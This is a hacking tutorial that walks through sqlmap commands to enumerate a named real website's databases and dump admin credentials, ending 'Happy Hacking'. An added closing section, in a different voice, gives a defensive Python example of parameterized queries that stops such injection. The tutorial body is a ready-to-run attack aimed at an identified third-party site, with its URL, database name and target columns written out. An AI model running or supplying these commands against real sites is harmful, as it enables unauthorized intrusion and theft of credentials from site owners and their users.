In the name of Allah, most gracious and merciful
Assalam O Alaikum guys, today I am going to teach you how to use sqlmap to extract database details. In this tutorial I am using Backtrack, and the tool we are using is sqlmap.
Let's Begin
Go to Backtrack. I am running Backtrack in VMware Workstation (a virtual PC).
Now open sqlmap. You can open it in two ways.
The first is to run this command in the terminal: cd /pentest/web/scanners/sqlmap
The other is to click Accessories >> Backtrack Tools >> Exploitation Tools >> Web Exploitation Tools >> sqlmap.
When the sqlmap terminal is open, start injecting. I am using an SQLi-vulnerable website.
We are using these parameters in this guide:
--dbs = Enumerate DBMS databases
-D = DB = DBMS database to enumerate
-T = TBL = DBMS database table to enumerate
-C = Col = DBMS database column to enumerate
--dump = Dump DBMS database table entries
--dump-all = Dump ALL DBMS database Table entries.
When you have your vulnerable website, copy its link, open the sqlmap terminal and type this:
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --dbs
and press Enter.
It will find the databases of the website. You can also use this command to find only the current database:
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --current-db
But I prefer to use --dbs for all databases. Once you have your database, your next step is finding the tables of the database.
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms --tables
Where "raahauges_com_cms" is the current database of the website we're using. Press Enter again and it will gather all the tables of this database.
After some time it will show you all the tables in the database.
When you are done with the tables, guess which table stores the admin password,
and type this command to list the columns of that table:
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin --columns
You'll get all the columns of the table admin. Now you have to extract the admin username and password,
so type this command:
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin -C uname,upwd --dump
Where "uname" and "upwd" are the column names in my target database. You have to put your target's column names here.
It will show you the username and password details of the admin. :)
Note: this website has no admin table, which is why I can't show you more screenshots :D
You can try it on your own; all the commands are given here :)
Enjoy, Happy Hacking
For educational purposes only.
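For the defender's side of the steps above: sqlmap can enumerate a database through a parameter like id=8 only when the application pastes the request value into its SQL text. The sketch below is an added example, not code from this tutorial or from the site it uses; the news table, its rows and both function names are constructed for illustration, and Python with sqlite3 stands in for the site's PHP page.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a site's news table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(7, "Draft"), (8, "Public story"), (9, "Internal memo")],
    )
    return conn

def view_news_vulnerable(conn, raw_id):
    # The request value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def view_news_hardened(conn, raw_id):
    # 1. Allow-list: the parameter must be a short run of ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    # 2. Bound parameter: the value travels separately from the SQL text,
    #    so it can never change the shape of the query.
    sql = "SELECT id, title FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    tampered = "8 OR 1=1"  # constructed non-numeric input
    print("vulnerable:", view_news_vulnerable(db, tampered))
    print("hardened  :", view_news_hardened(db, "8"))
    try:
        view_news_hardened(db, tampered)
    except ValueError as exc:
        print("rejected  :", exc)
```

With the bound parameter in place the id value is never parsed as SQL, so the --dbs, -D, -T and -C enumeration shown above has nothing to inject into.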